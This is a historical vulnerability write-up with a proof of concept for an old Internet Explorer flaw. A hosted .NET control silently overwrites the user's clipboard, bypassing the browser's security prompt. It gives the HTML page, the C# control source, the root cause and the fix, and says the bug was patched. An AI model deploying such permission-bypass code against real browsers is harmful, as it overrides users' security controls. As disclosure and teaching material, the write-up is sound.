Overwrite Clipboard With Hosted Control

A hosted .NET control can write arbitrary text to the clipboard without triggering IE’s security prompt, because Clipboard.SetDataObject is a .NET framework call that bypasses the browser’s clipboard access rules. From the browser’s perspective, the control is trusted, so the operation goes through silently.

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>OverwriteClipboardWithHostedControl</title></head>
<body>
<center>
<font size="2" face="Tahoma">
<h1>Overwrite Clipboard With Hosted Control</h1>

<object id="myApplet" classid="http:MyApplet.dll#AppStart" width="10" height="10"></object><br />

<script language="JavaScript">

function copyToClipboard()
{
	myApplet.SetClipboardText(clipBoardText.value);
	alert("That's it. Now you have the phrase: " + clipBoardText.value + " in the Clipboard");
}

</script>

<hr /><br />
Type something inside the textBox and press the [Copy to Clipboard] button.<br />
<input type="text" id="clipBoardText">
<input type="button" value="Copy to Clipboard" onclick="copyToClipboard()"><br /><br />
<hr />
</center>
</font>

</body>
</html>

MyApplet.cs (.NET user control source):

using System;
using System.Drawing;
using System.Windows.Forms;

public class AppStart : Control
{
	// This is the function that should not be allowed in Internet Zone.

	public void SetClipboardText(string clipString)
    {
        Clipboard.SetDataObject(clipString, true);
    }
    protected override void OnPaint(PaintEventArgs e)
    {
        e.Graphics.FillRectangle(new SolidBrush(Color.DeepSkyBlue), ClientRectangle);
    }
    [STAThread]
    public static void Main(string[] m)
    {
        AppStart myAppStart = new AppStart();
        myAppStart.Dock = DockStyle.Fill;
    }
}

IE’s clipboard security prompt applies to calls made through the DOM — document.execCommand("copy") etc. The .NET framework’s Clipboard.SetDataObject takes a different code path that isn’t gated by the same check. The fix was to apply clipboard restrictions based on the Internet Zone, regardless of the API path used to access the clipboard.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.